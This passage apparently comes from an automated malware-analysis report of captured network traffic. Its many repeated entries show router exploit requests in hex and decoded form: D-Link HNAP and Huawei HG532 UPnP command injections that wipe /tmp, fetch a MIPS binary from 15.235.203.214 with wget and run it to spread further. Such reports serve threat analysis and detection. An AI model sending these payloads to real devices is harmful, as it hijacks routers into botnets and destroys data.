32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 